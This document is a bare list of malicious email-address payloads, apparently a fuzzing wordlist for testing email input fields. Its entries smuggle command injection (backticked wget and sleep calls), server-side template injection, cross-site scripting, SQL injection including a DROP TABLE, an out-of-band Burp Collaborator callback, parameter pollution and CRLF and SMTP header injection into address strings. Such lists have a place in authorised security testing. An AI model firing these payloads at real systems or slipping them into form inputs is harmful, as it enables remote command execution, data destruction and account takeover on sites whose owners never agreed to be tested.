`wget%20baidu.com/xxxx`@qq.com
`sleep 3`/xxxx`@qq.com
"`sleep 3`"@qq.com
name@"`sleep 3`"qq.com
name@{`slee 3`}qq.com
name@qq.com(`sleep 3`)
name "($(sleep${IFS}3))"qq.com
name "($(sleep 3))"qq.com
test+{${{10001*2}}}@qq.com
"<%= 10001*2%>"@qq.com
"'-- %20"@qq.com
"{{10001*2}}"@qq.com
"{{'10001*2'}}"@qq.com
{$smarty.version}@qq.com
"{$smarty.version}"@qq.com
name@"{{'10001*2'}}"qq.com
name@{{10001*2}}qq.com
name@"{{10001*2}}"qq.com
@(10001+1)@qq.com
"@(10001+1)"@qq.com
aaa@"@(10001+1)"qq.com
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
john.doe@abc123.burpcollaborator.net
john.doe@[127.0.0.1]
victim&email=attacker@example.com
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com>\r\nRCPT TO:<victim+"@test.com